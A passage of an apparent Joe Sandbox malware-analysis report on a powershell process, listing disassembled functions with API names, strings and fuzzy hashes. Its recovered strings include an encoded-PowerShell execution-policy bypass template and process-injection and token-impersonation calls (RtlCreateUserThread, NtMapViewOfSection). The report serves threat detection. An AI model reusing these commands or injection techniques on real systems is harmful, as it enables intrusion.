                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Section$CurrentProcessView$AddressCreateErrorHandleLastModuleProcUnmap
                                                                                        • String ID: NtMapViewOfSection$ntdll.dll
                                                                                        • API String ID: 781901490-3170647572
                                                                                        • Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                                                                                        • Instruction ID: c6f5260ba1d12be06aa3acda5af208ae3f7d818073f9a03eadb67ab2a4cb8621
                                                                                        • Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                                                                                        • Instruction Fuzzy Hash: 9E31F43A312740C6EB10DB55E44979E6790F79ABA4F080325AE6907BD5DF7DC40A8701
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: strtok$_getptd_time64malloc
                                                                                        • String ID: eThreadpoolTimer
                                                                                        • API String ID: 1522986614-2707337283
                                                                                        • Opcode ID: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                                                                                        • Instruction ID: 7c22a6096eee3687ac25aa00fec161f39c7199ff4ea91eefbbc8919bf99a5b1c
                                                                                        • Opcode Fuzzy Hash: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                                                                                        • Instruction Fuzzy Hash: 3721F6BA702794C5EB40DF1AE0886DD37A8F766BD4F2A4615EF1A43781DA30C0458780
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                                                                        • String ID: uld not open process: %d (%u)
                                                                                        • API String ID: 2566950902-823969559
                                                                                        • Opcode ID: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                                                                                        • Instruction ID: 9cdb8b2c6c4e8d98e7285474fee1b90deba0bf310ae1eadf348165d056c6b6e4
                                                                                        • Opcode Fuzzy Hash: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                                                                                        • Instruction Fuzzy Hash: C9F0903A306640CDE291DB16B8113DEA260E7A6FC0FAC4520AF8827B9ADE38C4058746
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                                                                        • String ID: %s\%s
                                                                                        • API String ID: 1896346573-4073750446
                                                                                        • Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                                                                                        • Instruction ID: 79ccbc8aa192ec6f12e8206d5c48bd903cdbc77e541abd3d94443b7ff9fb6597
                                                                                        • Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                                                                                        • Instruction Fuzzy Hash: 75F06D3D306B40C5E210DB15B9103DEA360A7A7BD0F5C4120AF8817B96CE7DC4168746
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
                                                                                        • String ID:
                                                                                        • API String ID: 548016584-0
                                                                                        • Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                                                                                        • Instruction ID: d7b633631cf2eb5c66c04aba8959f66991daf2f3fe25f412757530f99b4edebb
                                                                                        • Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                                                                                        • Instruction Fuzzy Hash: 4FC1AF3D303680C2FA54EB6EA5557EE6291ABA7780F8C5134AA25477D7DE3EC40EC702
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
                                                                                        • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                                                                                        • API String ID: 199363273-1250630670
                                                                                        • Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                                                                                        • Instruction ID: 58ac02090bc863c427c30853611c5c9648959f4157d44c15331bf99041876f49
                                                                                        • Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                                                                                        • Instruction Fuzzy Hash: F271E13A702681CAEB90DF69E4407EE63A1F7A6BD8F481411EE4917B95DF78C80DC741
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                                                                                        • Instruction ID: 2b9861c9e0f4d587ce8d6d85a699dccb87dd83427397cfdcece7fc1efee07ffb
                                                                                        • Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                                                                                        • Instruction Fuzzy Hash: 4B51EF7AB06A40D6EB10EB69C4413ED2360F767BC8F489115EE092769ADF3EC94EC741
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 1640621425-0
                                                                                        • Opcode ID: 57e757c3e9ef67bf585f6834bef5a2b93b5f2aba1b240188d6fdf149938e6fd1
                                                                                        • Instruction ID: f6d22e2dd54e2c99c3a0c9d766660c98460cc3b0f2ef69c4d42d08f041983eb0
                                                                                        • Opcode Fuzzy Hash: 57e757c3e9ef67bf585f6834bef5a2b93b5f2aba1b240188d6fdf149938e6fd1
                                                                                        • Instruction Fuzzy Hash: 36412B3A302344CEFEA9DE2A95503DDA291B76AFD0F2C4A209F55577D1E678C44D820A
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 1640621425-0
                                                                                        • Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                                                                                        • Instruction ID: c9f603f891c40dfb645f6de864881deffb13384d87b887635f5d3ff1bdf85b11
                                                                                        • Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                                                                                        • Instruction Fuzzy Hash: C3414739302741C6FA68CE2A99413DEB291F7A7FE0F1C42209E56477D1D63AC4898742
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$_errno$_callnewhmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2761444284-0
                                                                                        • Opcode ID: 92672388aeb111ae4a498cfb84cb5bb8716f51ccf99680470dd4d67f6dd6a32d
                                                                                        • Instruction ID: d175483bb5412b7de9444e9f5e02a6a5f291e51479e2051c36d0147290434ed4
                                                                                        • Opcode Fuzzy Hash: 92672388aeb111ae4a498cfb84cb5bb8716f51ccf99680470dd4d67f6dd6a32d
                                                                                        • Instruction Fuzzy Hash: 2841DE3A706389CEEA96DB2F54106A96794BB77B98F1D4020DE158B745EE38C80FC306
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 996410232-0
                                                                                        • Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                                                                                        • Instruction ID: 3c1bd8e3787fdad316d50ef5d2830ac574527aa6857b7861e17eca56dfef2113
                                                                                        • Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                                                                                        • Instruction Fuzzy Hash: 2641F33E306785C6EA15DB2E59086AE6794B7B7BC8F0D5220DD658B785DE3CC41EC302
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                                                                                        • String ID: %s&%s$?%s
                                                                                        • API String ID: 1095232423-1750478248
                                                                                        • Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                                                                                        • Instruction ID: 27856539fea2b72f100b6d4ec5754d62ee37309c053db880975d2be6d6b28e91
                                                                                        • Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                                                                                        • Instruction Fuzzy Hash: 4441927A305E80D1EA21DB2ED1452EDA3A0FFAAB95F0C5511DF4827B61EF39D1A78340
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 2998201375-0
                                                                                        • Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                                                                                        • Instruction ID: d17b56c67a81ee2f17a3538b0dc89981f2382c4943b2b60eab09f1f092f855cb
                                                                                        • Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                                                                                        • Instruction Fuzzy Hash: 1A41A03A306780C6E760DF1991903A9BBE1FBA7BC1F1C4121EB8957B95DB38D8459701
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$free$_callnewhfclosefwritemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 1696598829-0
                                                                                        • Opcode ID: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                                                                                        • Instruction ID: fd652f688c93b9504d260dc841c1bc2ed1b337fca8df0981e54ce6d1f08ee5d3
                                                                                        • Opcode Fuzzy Hash: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                                                                                        • Instruction Fuzzy Hash: 15112739306640C9EA50E725E0013EE5390ABA6BD0F5C0620AF6D5B7CADE3CC50D8B42
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _getptd_noexit$__doserrno_errno
                                                                                        • String ID:
                                                                                        • API String ID: 2964073243-0
                                                                                        • Opcode ID: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                                                                                        • Instruction ID: 5c025e39d6d7c94f60e3d3dd9e05cdcdde05bfa9464c679559711c9f04f8ddb4
                                                                                        • Opcode Fuzzy Hash: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                                                                                        • Instruction Fuzzy Hash: F1018179B13644C9FA49AB2CC8413EC62525BB3BB2F9DC301D529073D2E728440C8223
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _getptd_noexit$__doserrno_errno
                                                                                        • String ID:
                                                                                        • API String ID: 2964073243-0
                                                                                        • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                                                                                        • Instruction ID: c2e2ce9dd46578ec45278cd6602a0891427222b06ad9339265a9096528ba03a8
                                                                                        • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                                                                                        • Instruction Fuzzy Hash: F701AF7E703644C5FA19EB2CC8913EC32929B73B76FAD4301D5290B3D2C72854499713
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %s!%s
                                                                                        • API String ID: 0-2935588013
                                                                                        • Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                                                                                        • Instruction ID: a50f082a339132fd17fd00e01d2afa9ba787cb961762c607fed40616877bc0e4
                                                                                        • Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                                                                                        • Instruction Fuzzy Hash: BD51907A306640C6EB60DF59E9047DD73A0F36BB95F485022EFAA47784DB38D84AC706
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _snprintfmallocstrrchr
                                                                                        • String ID: Failed to impersonate token: %d$t permissions in process: %d
                                                                                        • API String ID: 3587327836-1492073275
                                                                                        • Opcode ID: 8bde0d25350954084bff9422c3e5347b4112dda1e9a5fee9a92db8b801991847
                                                                                        • Instruction ID: eb89a20367d0799877161bc87f452ef11f5576560153b6ae7ad2f8d5faf840ff
                                                                                        • Opcode Fuzzy Hash: 8bde0d25350954084bff9422c3e5347b4112dda1e9a5fee9a92db8b801991847
                                                                                        • Instruction Fuzzy Hash: 8E41D538702241CAEB45EB3AA8443EE6791B797BD4F5C5520AF591B7DACF3CC40A8702
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$CreateInfoPipeSleepStartup
                                                                                        • String ID: h
                                                                                        • API String ID: 1809008225-2439710439
                                                                                        • Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                                                                                        • Instruction ID: 6b2ce184ed44901efb090d3dba688ff1f246914554b8e87e0b35bd1f8fc6c457
                                                                                        • Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                                                                                        • Instruction Fuzzy Hash: 4B41893A604B88CAE310CF69E8406CEB7B5F38A798F544115EE9C53B98DF79C54ACB40
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AccountInformationLookupToken_snprintf
                                                                                        • String ID: %s\%s
                                                                                        • API String ID: 2107350476-4073750446
                                                                                        • Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                                                                                        • Instruction ID: 3771e63d760c414b9d97c98563dfcdc484b14e6bda295ad06899152726c40efa
                                                                                        • Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                                                                                        • Instruction Fuzzy Hash: E731503A305BC1D5E724CF65E8046DA6364F79AB88F488126EA8957B58DF3DC20AC700
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: RtlCreateUserThread$ntdll.dll
                                                                                        • API String ID: 1646373207-2935400652
                                                                                        • Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                                                                                        • Instruction ID: 94445d2fad612f573610ad6fc42319e3d02dbfe03b3cebd8676760a7f413ce35
                                                                                        • Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                                                                                        • Instruction Fuzzy Hash: 3A11F736315B90C2EB20CF55F98458DB7A8F79AB80F998175AA9D43B14DF38C559C700
                                                                                        APIs
                                                                                        Strings
